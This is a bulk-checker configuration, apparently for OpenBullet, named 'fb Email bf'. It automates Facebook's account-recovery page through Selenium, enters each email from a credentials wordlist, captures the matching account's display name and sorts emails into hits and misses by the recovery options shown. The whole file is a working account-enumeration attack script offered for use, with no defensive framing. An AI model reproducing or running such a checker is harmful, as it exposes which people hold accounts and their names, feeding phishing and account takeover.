[SETTINGS]
{
    "name": "fb Email bf",
    "author": "Zanko",
    "category": "Default",
    "use_proxies": false,
    "use_captchas": false,
    "use_selenium": true,
    "cf_bypass": false,
    "allowed_wordlists": "Credentials",
    "suggested_bots": 5,
    "additional_info": "None",
    "version": "1.0.0",
    "last_modified": "2026-07-04 14:12:48",
    "max_cpm": 0,
    "save_empty_captures": false,
    "continue_custom": false,
    "save_hits_to_file": false,
    "proxy_settings": {
        "needs_proxies": false,
        "only_socks": false,
        "only_ssl": false,
        "ban_after_good": false,
        "max_uses": 0,
        "ban_loop": -1
    },
    "data_settings": {
        "allowed_wl_type": "Default",
        "urlencode": false,
        "rules": []
    },
    "selenium_settings": {
        "always_open": true,
        "always_quit": true,
        "quit_on_ban_retry": false,
        "headless": false,
        "disable_notifications": false,
        "custom_args": "",
        "user_agent": "",
        "use_random_ua": false
    }
}

[SCRIPT]
BLOCK:NAVIGATE url="https://www.facebook.com/" timeout="30" ban_on_timeout="false"

BLOCK:ELEMENTACTION selector_type="XPATH" selector="/html/body/div[1]/div/div/div/div/div/div/div[1]/div/div/div/div[1]/div/div[3]/div/div/div/div/div/div/div/div/div[2]/form/div/div[1]/div/div[4]/div/a/div\n" action="Wait for Element" value="" variable_name="" index="0" recursive="false" is_capture="false"

BLOCK:ELEMENTACTION selector_type="XPATH" selector="/html/body/div[1]/div/div/div/div/div/div/div[1]/div/div/div/div[1]/div/div[3]/div/div/div/div/div/div/div/div/div[2]/form/div/div[1]/div/div[4]/div/a/div\n" action="Click" value="" variable_name="" index="0" recursive="false" is_capture="false"

BLOCK:ELEMENTACTION selector_type="XPATH" selector="/html/body/div[1]/div/div[1]/div/div[2]/div/div/div[1]/div[1]/div/div/div/div[1]/div[1]/div/div/div/div/div/div[1]/div[2]/form/div/div/div[3]/div/div/div[1]/input" action="Wait for Element" value="" variable_name="" index="0" recursive="false" is_capture="false"

BLOCK:ELEMENTACTION selector_type="XPATH" selector="/html/body/div[1]/div/div[1]/div/div[2]/div/div/div[1]/div[1]/div/div/div/div[1]/div[1]/div/div/div/div/div/div[1]/div[2]/form/div/div/div[3]/div/div/div[1]/input" action="Input Text" value="<EMAIL>" variable_name="" index="0" recursive="false" is_capture="false"

BLOCK:ELEMENTACTION selector_type="XPATH" selector="/html/body/div[1]/div/div[1]/div/div[2]/div/div/div[1]/div[1]/div/div/div/div[1]/div[1]/div/div/div/div/div/div[1]/div[3]/div/div/div/div/div/div/div/div" action="Wait for Element" value="" variable_name="" index="0" recursive="false" is_capture="false"

BLOCK:ELEMENTACTION selector_type="XPATH" selector="/html/body/div[1]/div/div[1]/div/div[2]/div/div/div[1]/div[1]/div/div/div/div[1]/div[1]/div/div/div/div/div/div[1]/div[3]/div/div/div/div/div/div/div/div" action="Click" value="" variable_name="" index="0" recursive="false" is_capture="false"

BLOCK:ELEMENTACTION selector_type="XPATH" selector="/html/body/div[1]/div/div[1]/div/div[2]/div/div/div[1]/div[1]/div/div/div/div[1]/div[1]/div/div/div/div/div/div[1]/div[2]/div/div/div/div/div/div[2]/div/div/div/div/div/div/div/div/div/div[2]/div/div/div[1]/div" action="Wait for Element" value="" variable_name="" index="0" recursive="false" is_capture="false"

BLOCK:ELEMENTACTION selector_type="XPATH" selector="/html/body/div[1]/div/div[1]/div/div[2]/div/div/div[1]/div[1]/div/div/div/div[1]/div[1]/div/div/div/div/div/div[1]/div[2]/div/div/div/div/div/div[2]/div/div/div/div/div/div/div/div/div/div[2]/div/div/div[1]/div" action="Get Text" value="" variable_name="" index="0" recursive="false" is_capture="true"

BLOCK:PARSE source="<SOURCE>" variable_name="name" prefix="" suffix="" mode="LR" left_string="<div class=\"x9f619 x1n2onr6 x1ja2u2z x78zum5 xdt5ytf x2lah0s x193iq5w xeuugli x1iyjqo2\"><div class=\"x1diwwjn\"><div class=\"x1lliihq x1plvlek xryxfnj x1n2onr6 xyejjpt x15dsfln x193iq5w xeuugli x1fj9vlw x13faqbe x1vvkbs x1s928wv xhkezso x1gmr53x x1cpjm7i x1fgarty x1943h6x x1sfkdl8 xurcqga x3vd66c xhqx0jl xzsf02u x1yc453h xudqn12 x3x7a5m xjpr12u x1nn3v0j\" style=\"--x---base-line-clamp-line-height: calc(var(--primary-label-line-height) * 1em); --x-lineHeight: calc(var(--primary-label-line-height) * 1em);\"><div class=\"x1qjc9v5 x9f619 x78zum5 xdl72j9 xdt5ytf x2lah0s x2lwn1j xeuugli x1n2onr6 x1ja2u2z\">" right_string="</div></div><div class=\"x1lliihq x1plvlek xryxfnj x1n2onr6 xyejjpt x15dsfln x193iq5w xeuugli x1fj9vlw x13faqbe x1vvkbs x1s928wv xhkezso x1gmr53x x1cpjm7i x1fgarty x1943h6x xt4736n x1havqas x1f0sm9e x12qp5cl xi81zsa x1yc453h xudqn12 x3x7a5m xjpr12u x889kno\" style=\"--x---base-line-clamp-line-height: calc(var(--body-line-height) * 1em); --x-lineHeight: calc(var(--body-line-height) * 1em);\">Facebook</div></div></div></div></div></div></div></div></div></div></div></div>" recursive="false" enc_output="false" create_empty="false"

BLOCK:KEYCHECK insta_ban_4xx="false" ban_if_no_key="false" keychains="[{\"type\": \"Success\", \"mode\": \"OR\", \"keys\": [\"Get code via email\", \"Get code via SMS\", \"Not you?\"]}, {\"type\": \"Failure\", \"mode\": \"OR\", \"keys\": [\"No account found. Check your mobile number or email address and try again.\"]}]"
